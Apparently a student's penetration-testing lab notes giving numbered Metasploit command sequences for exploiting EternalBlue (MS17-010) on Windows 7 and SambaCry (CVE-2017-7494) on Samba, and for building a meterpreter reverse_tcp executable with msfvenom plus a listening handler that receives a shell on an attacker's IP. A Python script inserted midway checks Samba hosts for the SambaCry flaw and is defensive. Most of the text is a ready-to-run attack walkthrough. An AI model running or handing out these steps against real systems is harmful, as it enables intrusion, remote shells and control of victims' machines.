- Netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network. netapi32.dll is a system component that is needed for your PC to work properly and it should not be removed. The version of Netapi32.dll in Win XP SP2 is vulnerable and allows a remote attacker to get remote access to the machine.
- DCOM is an acronym that stands for Distributed Component Object Model. It is a protocol that enables software components to communicate directly over a network, and by default it runs in Win XP SP0-SP1 and Win Server 2000.
- https://lucideustech.blogspot.com/2017/12/the-eternal-exploitation-bible-lucideus.html
- Grade 2 Session 8
- =================
- Console Based Exploitation 3
- Windows 7 --> Eternal Blue
- Samba Cry --> Eternal Red
- Application Based Exploitation
- Payload Based Exploitation
- Post Exploitation --> Local Privilege Escalation
- GUI Based Exploitation --> Armitage
- Console Based Exploitation 3
- ----------------------------
- Eternal Blue --> NSA Exploit leaked by Shadow Brokers
- EternalBlue-Double Pulsar
- dll --> Dynamic Link Library file
- Double Pulsar creates a malicious .dll file and Eternal Blue executes that malicious .dll file in the target system.
- Shadow Brokers ---> Fuzzbunch.py
- Empire --> MSF of NSA
- Metasploit Module
- Steps
- =====
- Open a terminal
- 1. #arp-scan --local
- Target IP Address --> 192.168.228.138
- 2. #nmap 192.168.228.138
- 3. #nmap -sS -sC -sV 192.168.228.138
- 4. #nmap 192.168.228.138 --script vuln
- CVE-2017-0143
- Open another terminal, start metasploit framework
- 5. #msfconsole
- 6. #search CVE-2017-0143
- 7. #use auxiliary/scanner/smb/smb_ms17_010
- 8. #options
- 9. #set rhosts 192.168.228.138
- 10. #options
- 11. #run
- Host is vulnerable to the exploit
- 12. #use exploit/windows/smb/ms17_010_eternalblue
- 13. #show options
- 14. #set rhost 192.168.228.138
- 15. #options
- 16. #exploit
- C:/Windows/System32> --> I got access to the command prompt
- For Changing the payload
- set payload windows/meterpreter/reverse_tcp
- Samba Cry - Eternal Red
- =======================
- This is the vulnerability for Linux-based OSes. SMBv2.
- NSA Exploit leaked by Shadow Brokers.
- Open a terminal
- 1. #arp-scan --local
- Target IP Address --> 192.168.228.151
- 2. #nmap 192.168.228.151
- 3. #nmap -sS -sC -sV 192.168.228.151
- 4. #nmap 192.168.228.151 --script vuln
- Open another terminal, start metasploit framework
- 5. #search is_known_pipename
- 6. #search cve-2017-7494
- exploit/linux/samba/is_known_pipename
- 7. #use exploit/linux/samba/is_known_pipename
- 8. #info
- 9. #options
- 10. #set rhost 192.168.228.151
- 11. #run
- Will give me a raw shell --> bash shell
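As an added defensive check (not part of these notes), the Python below assesses a Samba host for CVE-2017-7494 from its version banner (the kind `nmap -sV` prints) and from its smb.conf, using the fixed releases and the `nt pipe support = no` workaround named in the Samba advisory; the banner and config are constructed samples. Distributions that backport the fix keep an older version string, so a version-only result is a prompt to verify the package changelog, not a verdict.

```python
import re
# Upstream fix releases from the Samba advisory for CVE-2017-7494 (SambaCry):
# every stock release from 3.5.0 up to these is affected; later branches never shipped the bug.
FIRST_AFFECTED = (3, 5, 0)
FIXED_IN_BRANCH = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}

def parse_version(banner):
    """Pull a dotted version out of a banner such as 'Samba smbd 4.3.11-Ubuntu' (None if absent)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None

def is_affected_version(version):
    """True if a stock (non-backported) Samba of this version still carries CVE-2017-7494."""
    if version < FIRST_AFFECTED:
        return False
    branch = version[:2]
    if branch in FIXED_IN_BRANCH:
        return version < FIXED_IN_BRANCH[branch]
    # Branches 3.5 .. 4.3 had no fixed release upstream (source patches only); 4.7+ never had the bug.
    return branch < (4, 6)

def workaround_present(smb_conf):
    """True if the advisory's workaround 'nt pipe support = no' is set in the [global] section."""
    section = None
    for raw in smb_conf.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop smb.conf comments
        if not line: continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "global" and "=" in line:
            key, value = (part.strip().lower() for part in line.split("=", 1))
            if key == "nt pipe support":
                return value in ("no", "false", "0")
    return False

def assess(banner, smb_conf):
    version = parse_version(banner)  # verdict: unknown / patched / mitigated / exposed
    if version is None:
        return "unknown"
    if not is_affected_version(version):
        return "patched"
    return "mitigated" if workaround_present(smb_conf) else "exposed"

# Constructed sample inputs (not taken from a real host).
SAMPLE_BANNER = "Samba smbd 4.3.11-Ubuntu"
SAMPLE_SMB_CONF = """\
[global]
   nt pipe support = no   ; advisory workaround
[share]
   path = /srv/samba/share
"""
```

Run `assess(SAMPLE_BANNER, SAMPLE_SMB_CONF)` on the samples and it returns "mitigated"; swap in a config without the workaround and it returns "exposed".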
- Application Based Exploitation
- ==============================
- Open the terminal, start with msfconsole
- 1. #msfconsole
- 2. #search payload/windows/meterpreter
- payload/windows/meterpreter/reverse_tcp --> use
- payload/windows/meterpreter_reverse_tcp
- payload/windows/meterpreter/reverse_http
- Open another terminal for creating a payload (stub)
- 3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
- -p --> selecting the payload
- windows/meterpreter/reverse_tcp --> is the payload
- lhost --> attacker's IP address
- lport --> attacker's listening port
- -f --> file format
- exe --> executable file
- > --> redirects the output to a file
- /root/Desktop/prasheel.exe --> is the output file
- Go back to the first terminal and set up the listening handler
- 4. #use exploit/multi/handler
- 5. #show options
- 6. #set payload windows/meterpreter/reverse_tcp
- 7. #show options
- 8. #set lport 8989
- 9. #set lhost 192.168.0.25
- 10. #exploit
- Armitage --> GUI Based Exploitation
- Graphical Version of Metasploit Framework